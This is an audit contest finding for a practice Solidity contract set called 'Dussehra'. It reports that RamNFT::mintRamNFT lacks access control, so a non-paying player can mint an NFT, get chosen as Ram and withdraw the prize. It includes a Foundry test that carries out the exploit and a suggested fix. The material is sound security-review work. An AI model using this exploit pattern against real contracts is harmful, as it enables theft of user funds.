First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

A free participant could steal the prize because RamNFT::mintRamNFT has no restrictions, allowing minting outside the Dussehra rules

lulox

Summary

RamNFT::mintRamNFT has no restrictions and opens the window to a free participant to steal the prize if it gets selected by ChoosingRam::selectRamIfNotSelected. RamNFT::mintRamNFT should be only called by Dussehra::enterPeopleWhoLikeRam

Vulnerability Details

The "free" RamNFT could be selected as Ram when ChoosingRam::selectRamIfNotSelected is called, thus allowing the owner of the "free" RamNFT to withdraw the prize after Dussehra::killRavana is called using Dussehra::withdraw.

Impact

A player that hasn't paid the entrance fee can get to steal the prize intended for paid participants.

Tools Used

Manual review

Proof of Code

Include this test in test/Dussehra.t.sol

function test_freeRamNFTStealsPrizeAfterkillRavana() public participants {
vm.startPrank(player3);
ramNFT.mintRamNFT(player3);
vm.stopPrank();
assertEq(player3.balance, 0); // Starting balance
assertEq(ramNFT.ownerOf(2), player3);
assertEq(ramNFT.getCharacteristics(2).ram, player3);
vm.warp(1728691200 + 1);
vm.startPrank(organiser);
choosingRam.selectRamIfNotSelected();
vm.stopPrank();
assertEq(choosingRam.selectedRam(), player3);
vm.startPrank(player3);
dussehra.killRavana();
dussehra.withdraw();
vm.stopPrank();
// Ending balance (note that the participants modifier makes player1 and player2 enter paying the entrance fee
assertEq(player3.balance, 1 ether);
}

Recommendations

Add a way to check if the Dussehra contract is the one calling the RamNFT::mintRamNFT.

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

mintRamNFT is public

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.